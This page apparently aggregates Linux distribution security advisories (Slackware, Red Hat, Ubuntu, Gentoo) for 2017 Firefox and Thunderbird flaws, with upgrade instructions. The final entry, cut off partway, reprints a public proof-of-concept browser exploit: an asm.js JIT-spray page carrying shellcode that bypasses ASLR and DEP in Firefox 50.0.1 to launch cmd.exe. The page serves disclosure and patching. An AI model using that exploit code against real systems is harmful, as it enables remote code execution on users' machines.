    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5373
  (* Security fix *)
+--------------------------+


Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-thunderbird-45.7.0-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-thunderbird-45.7.0-x86_64-1_slack14.1.txz

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mozilla-thunderbird-45.7.0-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mozilla-thunderbird-45.7.0-x86_64-1_slack14.2.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-45.7.0-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-45.7.0-x86_64-1.txz


MD5 signatures:
+-------------+

Slackware 14.1 package:
b944bea9c98775dc812beb3151933382  mozilla-thunderbird-45.7.0-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
71f006a9aed72154ba8d49e2e30d05b0  mozilla-thunderbird-45.7.0-x86_64-1_slack14.1.txz

Slackware 14.2 package:
b0b51e73c2d9f489609b66a8719baac2  mozilla-thunderbird-45.7.0-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
8c764b5f61595020e3cd5c320c1f9116  mozilla-thunderbird-45.7.0-x86_64-1_slack14.2.txz

Slackware -current package:
57c3693787752848428469ec69996f58  xap/mozilla-thunderbird-45.7.0-i586-1.txz

Slackware x86_64 -current package:
549218c6ad3bc9e9cd5f103072a1b1db  xap/mozilla-thunderbird-45.7.0-x86_64-1.txz


Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg mozilla-thunderbird-45.7.0-i586-1_slack14.2.txz


+-----+

Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com

+------------------------------------------------------------------------+
| To leave the slackware-security mailing list:                          |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message:                                                     |
|                                                                        |
|   unsubscribe slackware-security                                       |
|                                                                        |
| You will get a confirmation message back containing instructions to    |
| complete the process.  Please do not reply to this email address.      |
+------------------------------------------------------------------------+
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAliKQ1oACgkQakRjwEAQIjPV3QCePFBQqWZhoD3763EVq/MWnE1Y
cgYAn0tcUu0Dln/gj8ftUgJPb0m67bU+
=f/NU
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F140896)

Red Hat Security Advisory 2017-0238-01 (PacketStormID:F140896)
2017-02-02 00:00:00
Red Hat  
advisory,web,arbitrary
linux,redhat
CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5390,CVE-2017-5396
[点击下载]

Red Hat Security Advisory 2017-0238-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 45.7.0. Security Fix: Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update
Advisory ID:       RHSA-2017:0238-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2017-0238.html
Issue date:        2017-02-02
CVE Names:         CVE-2017-5373 CVE-2017-5375 CVE-2017-5376 
                   CVE-2017-5378 CVE-2017-5380 CVE-2017-5383 
                   CVE-2017-5390 CVE-2017-5396 
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 5,
Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Optional Productivity Applications (v. 5 server) - i386, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64le, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 45.7.0.

Security Fix(es):

* Multiple flaws were found in the processing of malformed web content. A
web page containing malicious content could cause Thunderbird to crash or,
potentially, execute arbitrary code with the privileges of the user running
Thunderbird. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,
CVE-2017-5380, CVE-2017-5383, CVE-2017-5390, CVE-2017-5396)

Red Hat would like to thank the Mozilla project for reporting these issues.
Upstream acknowledges Jann Horn, Filipe Gomes, Nils, Armin Razmjou,
Christian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster,
Oriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original reporters.

4. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1415924 - CVE-2017-5373 Mozilla: Memory safety bugs fixed in Firefox 51 and Firefox ESR 45.7 (MFSA 2017-01)
1416271 - CVE-2017-5375 Mozilla: Excessive JIT code allocation allows bypass of ASLR and DEP (MFSA 2017-02)
1416272 - CVE-2017-5376 Mozilla: Use-after-free in XSL (MFSA 2017-02)
1416273 - CVE-2017-5378 Mozilla: Pointer and frame data leakage of Javascript objects (MFSA 2017-02)
1416274 - CVE-2017-5380 Mozilla: Potential use-after-free during DOM manipulations (MFSA 2017-02)
1416279 - CVE-2017-5390 Mozilla: Insecure communication methods in Developer Tools JSON viewer (MFSA 2017-02)
1416280 - CVE-2017-5396 Mozilla: Use-after-free with Media Decoder (MFSA 2017-02)
1416281 - CVE-2017-5383 Mozilla: Location bar spoofing with unicode characters (MFSA 2017-02)

6. Package List:

Red Hat Enterprise Linux Desktop (v. 5 client):

Source:
thunderbird-45.7.0-1.el5_11.src.rpm

i386:
thunderbird-45.7.0-1.el5_11.i386.rpm
thunderbird-debuginfo-45.7.0-1.el5_11.i386.rpm

x86_64:
thunderbird-45.7.0-1.el5_11.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el5_11.x86_64.rpm

Red Hat Enterprise Linux Optional Productivity Applications (v. 5 server):

Source:
thunderbird-45.7.0-1.el5_11.src.rpm

i386:
thunderbird-45.7.0-1.el5_11.i386.rpm
thunderbird-debuginfo-45.7.0-1.el5_11.i386.rpm

x86_64:
thunderbird-45.7.0-1.el5_11.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el5_11.x86_64.rpm

Red Hat Enterprise Linux Desktop (v. 6):

Source:
thunderbird-45.7.0-1.el6_8.src.rpm

i386:
thunderbird-45.7.0-1.el6_8.i686.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.i686.rpm

x86_64:
thunderbird-45.7.0-1.el6_8.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

Source:
thunderbird-45.7.0-1.el6_8.src.rpm

i386:
thunderbird-45.7.0-1.el6_8.i686.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.i686.rpm

ppc64:
thunderbird-45.7.0-1.el6_8.ppc64.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.ppc64.rpm

s390x:
thunderbird-45.7.0-1.el6_8.s390x.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.s390x.rpm

x86_64:
thunderbird-45.7.0-1.el6_8.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source:
thunderbird-45.7.0-1.el6_8.src.rpm

i386:
thunderbird-45.7.0-1.el6_8.i686.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.i686.rpm

x86_64:
thunderbird-45.7.0-1.el6_8.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Client (v. 7):

Source:
thunderbird-45.7.0-1.el7_3.src.rpm

x86_64:
thunderbird-45.7.0-1.el7_3.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el7_3.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:
thunderbird-45.7.0-1.el7_3.src.rpm

aarch64:
thunderbird-45.7.0-1.el7_3.aarch64.rpm
thunderbird-debuginfo-45.7.0-1.el7_3.aarch64.rpm

ppc64le:
thunderbird-45.7.0-1.el7_3.ppc64le.rpm
thunderbird-debuginfo-45.7.0-1.el7_3.ppc64le.rpm

x86_64:
thunderbird-45.7.0-1.el7_3.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el7_3.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:
thunderbird-45.7.0-1.el7_3.src.rpm

x86_64:
thunderbird-45.7.0-1.el7_3.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el7_3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2017-5373
https://access.redhat.com/security/cve/CVE-2017-5375
https://access.redhat.com/security/cve/CVE-2017-5376
https://access.redhat.com/security/cve/CVE-2017-5378
https://access.redhat.com/security/cve/CVE-2017-5380
https://access.redhat.com/security/cve/CVE-2017-5383
https://access.redhat.com/security/cve/CVE-2017-5390
https://access.redhat.com/security/cve/CVE-2017-5396
https://access.redhat.com/security/updates/classification/#important
https://www.mozilla.org/en-US/security/advisories/mfsa2017-03/

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2017 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFYksbBXlSAg2UNWIIRAmE/AJ9v2GkhbI7z8KNm4DsEjP8Qhjn8/wCfQrsj
udSzVHVv4uPEHHnQzABhJOE=
=E0xe
-----END PGP SIGNATURE-----


--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
    

- 漏洞信息 (F140946)

Ubuntu Security Notice USN-3175-2 (PacketStormID:F140946)
2017-02-07 00:00:00
Ubuntu  security.ubuntu.com
advisory,denial of service,arbitrary,vulnerability
linux,ubuntu
CVE-2017-5375,CVE-2017-5376,CVE-2017-5377,CVE-2017-5378,CVE-2017-5379,CVE-2017-5380,CVE-2017-5381,CVE-2017-5382,CVE-2017-5383,CVE-2017-5384,CVE-2017-5385,CVE-2017-5386,CVE-2017-5387,CVE-2017-5388,CVE-2017-5389,CVE-2017-5390,CVE-2017-5391,CVE-2017-5393,CVE-2017-5396
[点击下载]

Ubuntu Security Notice 3175-2 - USN-3175-1 fixed vulnerabilities in Firefox. The update caused a regression on systems where the AppArmor profile for Firefox is set to enforce mode. This update fixes the problem. Multiple memory safety issues were discovered in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code. JIT code allocation can allow a bypass of ASLR protections in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. Nicolas GrAgoire discovered a use-after-free when manipulating XSL in XSLT documents in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. Atte Kettunen discovered a memory corruption issue in Skia in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. Various other issues were also addressed.

==========================================================================
Ubuntu Security Notice USN-3175-2
February 06, 2017

firefox regression
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS

Summary:

USN-3175-1 introduced a regression in Firefox.

Software Description:
- firefox: Mozilla Open Source web browser

Details:

USN-3175-1 fixed vulnerabilities in Firefox. The update caused a
regression on systems where the AppArmor profile for Firefox is set to
enforce mode. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Multiple memory safety issues were discovered in Firefox. If a user were
 tricked in to opening a specially crafted website, an attacker could
 potentially exploit these to cause a denial of service via application
 crash, or execute arbitrary code. (CVE-2017-5373, CVE-2017-5374)
 
 JIT code allocation can allow a bypass of ASLR protections in some
 circumstances. If a user were tricked in to opening a specially crafted
 website, an attacker could potentially exploit this to cause a denial of
 service via application crash, or execute arbitrary code. (CVE-2017-5375)
 
 Nicolas GrA(c)goire discovered a use-after-free when manipulating XSL in
 XSLT documents in some circumstances. If a user were tricked in to opening
 a specially crafted website, an attacker could potentially exploit this to
 cause a denial of service via application crash, or execute arbitrary
 code. (CVE-2017-5376)
 
 Atte Kettunen discovered a memory corruption issue in Skia in some
 circumstances. If a user were tricked in to opening a specially crafted
 website, an attacker could potentially exploit this to cause a denial of
 service via application crash, or execute arbitrary code. (CVE-2017-5377)
 
 Jann Horn discovered that an object's address could be discovered through
 hashed codes of JavaScript objects shared between pages. If a user were
 tricked in to opening a specially crafted website, an attacker could
 potentially exploit this to obtain sensitive information. (CVE-2017-5378)
 
 A use-after-free was discovered in Web Animations in some circumstances.
 If a user were tricked in to opening a specially crafted website, an
 attacker could potentially exploit this to cause a denial of service via
 application crash, or execute arbitrary code. (CVE-2017-5379)
 
 A use-after-free was discovered during DOM manipulation of SVG content in
 some circumstances. If a user were tricked in to opening a specially
 crafted website, an attacker could potentially exploit this to cause a
 denial of service via application crash, or execute arbitrary code.
 (CVE-2017-5380)
 
 Jann Horn discovered that the "export" function in the Certificate Viewer
 can force local filesystem navigation when the Common Name contains
 slashes. If a user were tricked in to exporting a specially crafted
 certificate, an attacker could potentially exploit this to save content
 with arbitrary filenames in unsafe locations. (CVE-2017-5381)
 
 Jerri Rice discovered that the Feed preview for RSS feeds can be used to
 capture errors and exceptions generated by privileged content. An attacker
 could potentially exploit this to obtain sensitive information.
 (CVE-2017-5382)
 
 Armin Razmjou discovered that certain unicode glyphs do not trigger
 punycode display. An attacker could potentially exploit this to spoof the
 URL bar contents. (CVE-2017-5383)
 
 Paul Stone and Alex Chapman discovered that the full URL path is exposed
 to JavaScript functions specified by Proxy Auto-Config (PAC) files. If a
 user has enabled Web Proxy Auto Detect (WPAD), an attacker could
 potentially exploit this to obtain sensitive information. (CVE-2017-5384)
 
 Muneaki Nishimura discovered that data sent in multipart channels will
 ignore the Referrer-Policy response headers. An attacker could potentially
 exploit this to obtain sensitive information. (CVE-2017-5385)
 
 Muneaki Nishimura discovered that WebExtensions can affect other
 extensions using the data: protocol. If a user were tricked in to
 installing a specially crafted addon, an attacker could potentially
 exploit this to obtain sensitive information or gain additional
 privileges. (CVE-2017-5386)
 
 Mustafa Hasan discovered that the existence of local files can be
 determined using the <track> element. An attacker could potentially
 exploit this to obtain sensitive information. (CVE-2017-5387)
 
 Cullen Jennings discovered that WebRTC can be used to generate large
 amounts of UDP traffic. An attacker could potentially exploit this to
 conduct Distributed Denial-of-Service (DDOS) attacks. (CVE-2017-5388)
 
 Kris Maglione discovered that WebExtensions can use the mozAddonManager
 API by modifying the CSP headers on sites with the appropriate permissions
 and then using host requests to redirect script loads to a malicious site.
 If a user were tricked in to installing a specially crafted addon, an
 attacker could potentially exploit this to install additional addons
 without user permission. (CVE-2017-5389)
 
 Jerri Rice discovered insecure communication methods in the Dev Tools JSON
 Viewer. An attacker could potentially exploit this to gain additional
 privileges. (CVE-2017-5390)
 
 Jerri Rice discovered that about: pages used by content can load
 privileged about: pages in iframes. An attacker could potentially exploit
 this to gain additional privileges, in combination with a
 content-injection bug in one of those about: pages. (CVE-2017-5391)
 
 Stuart Colville discovered that mozAddonManager allows for the
 installation of extensions from the CDN for addons.mozilla.org, a publicly
 accessible site. If a user were tricked in to installing a specially
 crafted addon, an attacker could potentially exploit this, in combination
 with a cross-site scripting (XSS) attack on Mozilla's AMO sites, to
 install additional addons. (CVE-2017-5393)
 
 Filipe Gomes discovered a use-after-free in the media decoder in some
 circumstances. If a user were tricked in to opening a specially crafted
 website, an attacker could potentially exploit this to cause a denial of
 service via application crash, or execute arbitrary code. (CVE-2017-5396)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 16.10:
  firefox                         51.0.1+build2-0ubuntu0.16.10.2

Ubuntu 16.04 LTS:
  firefox                         51.0.1+build2-0ubuntu0.16.04.2

Ubuntu 14.04 LTS:
  firefox                         51.0.1+build2-0ubuntu0.14.04.2

Ubuntu 12.04 LTS:
  firefox                         51.0.1+build2-0ubuntu0.12.04.2

After a standard system update you need to restart Firefox to make
all the necessary changes.

References:
  http://www.ubuntu.com/usn/usn-3175-2
  http://www.ubuntu.com/usn/usn-3175-1
  https://launchpad.net/bugs/1659922

Package Information:
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.16.10.2
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.16.04.2
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.14.04.2
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.12.04.2


    

- 漏洞信息 (F141190)

Gentoo Linux Security Advisory 201702-22 (PacketStormID:F141190)
2017-02-21 00:00:00
Gentoo  security.gentoo.org
advisory,arbitrary,vulnerability
linux,gentoo
CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5386,CVE-2017-5390,CVE-2017-5396
[点击下载]

Gentoo Linux Security Advisory 201702-22 - Multiple vulnerabilities have been found in Mozilla Firefox, the worst of which may allow execution of arbitrary code. Versions less than 45.7.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201702-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal
    Title: Mozilla Firefox: Multiple vulnerabilities
     Date: February 20, 2017
     Bugs: #607138
       ID: 201702-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been found in Mozilla Firefox, the worst
of which may allow execution of arbitrary code.

Background
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla
Project.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  www-client/firefox           < 45.7.0                  >= 45.7.0
  2  www-client/firefox-bin       < 45.7.0                  >= 45.7.0
    -------------------------------------------------------------------
     2 affected packages

Description
===========

Multiple vulnerabilities have been discovered in Mozilla Firefox.
Please review the CVE identifiers referenced below for details.

Impact
======

A remote attacker could possibly execute arbitrary code with the
privileges of the process, cause a Denial of Service condition, bypass
access restriction, access otherwise protected information, or spoof
content via multiple vectors.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=www-client/firefox-45.7.0"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-45.7.0"

References
==========

[  1 ] CVE-2017-5373
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5373
[  2 ] CVE-2017-5375
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5375
[  3 ] CVE-2017-5376
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5376
[  4 ] CVE-2017-5378
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5378
[  5 ] CVE-2017-5380
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5380
[  6 ] CVE-2017-5383
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5383
[  7 ] CVE-2017-5386
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5386
[  8 ] CVE-2017-5390
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5390
[  9 ] CVE-2017-5396
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5396
[ 10 ] Mozilla Foundation Security Advisory 2017-02
       https://www.mozilla.org/en-US/security/advisories/mfsa2017-02/

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 https://security.gentoo.org/glsa/201702-22

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


--ApD7j60bgKKCVrosHhhgQpr2PXqxmUd2o--

    

- 漏洞信息 (F141182)

Gentoo Linux Security Advisory 201702-13 (PacketStormID:F141182)
2017-02-21 00:00:00
Gentoo  security.gentoo.org
advisory,arbitrary,vulnerability
linux,gentoo
CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5390,CVE-2017-5396
[点击下载]

Gentoo Linux Security Advisory 201702-13 - Multiple vulnerabilities have been found in Mozilla Thunderbird, the worst of which could lead to the execution of arbitrary code. Versions less than 45.7.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201702-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High
    Title: Mozilla Thunderbird: Multiple vulnerabilities
     Date: February 20, 2017
     Bugs: #607310
       ID: 201702-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been found in Mozilla Thunderbird, the
worst of which could lead to the execution of arbitrary code.

Background
==========

Mozilla Thunderbird is a popular open-source email client from the
Mozilla project.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  mail-client/thunderbird      < 45.7.0                  >= 45.7.0
  2  mail-client/thunderbird-bin
                                  < 45.7.0                  >= 45.7.0
    -------------------------------------------------------------------
     2 affected packages

Description
===========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird.
Please review the CVE identifiers referenced below for details.

Impact
======

A remote attacker, by enticing a user to open a specially crafted email
or web page, could possibly execute arbitrary code with the privileges
of the process or cause a Denial of Service condition.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-45.7.0"=


All Mozilla Thunderbird binary users should upgrade to the latest
version:

  # emerge --sync
  # emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-45.7.0"

References
==========

[ 1 ] CVE-2017-5373
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5373
[ 2 ] CVE-2017-5375
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5375
[ 3 ] CVE-2017-5376
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5376
[ 4 ] CVE-2017-5378
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5378
[ 5 ] CVE-2017-5380
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5380
[ 6 ] CVE-2017-5383
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5383
[ 7 ] CVE-2017-5390
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5390
[ 8 ] CVE-2017-5396
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5396
[ 9 ] Mozilla Foundation Security Advisory 2017-03
      https://www.mozilla.org/en-US/security/advisories/mfsa2017-03/

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 https://security.gentoo.org/glsa/201702-13

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


--96nNxi1vCPKP4WbXDcFSaOuUWLKWlbx7B--

    

- 漏洞信息 (F143373)

Firefox 50.0.1 ASM.JS JIT-Spray Remote Code Execution (PacketStormID:F143373)
2017-07-14 00:00:00
Rh0  
exploit
CVE-2016-9079,CVE-2017-5375
[点击下载]

Firefox version 50.0.1 full ASLR and DEP bypass exploit using ASM.JS JIT-spray.

<!DOCTYPE HTML>
 
<!--
 
    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    PoC Exploit against Firefox 50.0.1 (CVE-2016-9079 - Tor Browser 0day)
 
    Tested on:
 
    Release 50.0.1 32-bit - Windows 8.1 / Windows 10
    https://ftp.mozilla.org/pub/firefox/releases/50.0.1/win32/en-US/Firefox%20Setup%2050.0.1.exe
 
    Howto:
 
    1) serve PoC over network and open it in Firefox 50.0.1 32-bit
    2) if you don't see cmd.exe, open processexplorer and verify that cmd.exe was spawned by firefox.exe
 
    A successfull exploit attempt should pop cmd.exe
 
    Writeup: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/
     
    (C) Rh0
 
    Jul. 13, 2017
 
-->
 
<script async>
function asm_js_module(){
    "use asm";
    /* huge jitted nop sled */
    function payload_code(){
        var val = 0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        /* 3 byte VirtualAlloc RWX stager */
        val = (val + 0xa890db31)|0;
        val = (val + 0xa89030b3)|0;
        val = (val + 0xa81b8b64)|0;
        val = (val + 0xa80c5b8b)|0;
        val = (val + 0xa81c5b8b)|0;
        val = (val + 0xa8b9006a)|0;
        val = (val + 0xa8904c4c)|0;
        val = (val + 0xa8902eb1)|0;
        val = (val + 0xa85144b5)|0;
        val = (val + 0xa8b99090)|0;
        val = (val + 0xa8903233)|0;
        val = (val + 0xa89045b1)|0;
        val = (val + 0xa8514cb5)|0;
        val = (val + 0xa8b99090)|0;
        val = (val + 0xa8904e52)|0;
        val = (val + 0xa8904bb1)|0;
        val = (val + 0xa85145b5)|0;
        val = (val + 0xa8590e6a)|0;
        val = (val + 0xa84fe789)|0;
        val = (val + 0xa8086b8b)|0;
        val = (val + 0xa820738b)|0;
        val = (val + 0xa8471b8b)|0;
        val = (val + 0xa82ae349)|0;
        val = (val + 0xa890c031)|0;
        val = (val + 0xa890ad66)|0;
        val = (val + 0xa89c613c)|0;
        val = (val + 0xa8077c9d)|0;
        val = (val + 0xa890202c)|0;
        val = (val + 0xa89c073a)|0;
        val = (val + 0xa8d7749d)|0;
        val = (val + 0xa890bdeb)|0;
        val = (val + 0xa8b9006a)|0;
        val = (val + 0xa890636f)|0;
        val = (val + 0xa8906cb1)|0;
        val = (val + 0xa8516cb5)|0;
        val = (val + 0xa8b99090)|0;
        val = (val + 0xa890416c)|0;
        val = (val + 0xa89075b1)|0;
        val = (val + 0xa85161b5)|0;
        val = (val + 0xa8b99090)|0;
        val = (val + 0xa8907472)|0;
        val = (val + 0xa89056b1)|0;
